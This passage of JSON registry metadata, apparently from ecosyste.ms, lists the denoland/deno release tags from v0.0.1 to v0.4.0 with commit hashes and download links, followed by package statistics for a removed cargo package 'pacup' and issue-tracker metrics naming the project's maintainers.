:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:51:48.009Z","dependent_packages_count":0,"downloads":563,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.40095122018273,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.533801306782255},"purl":"pkg:cargo/pacup","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacup","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacup","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacup/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.e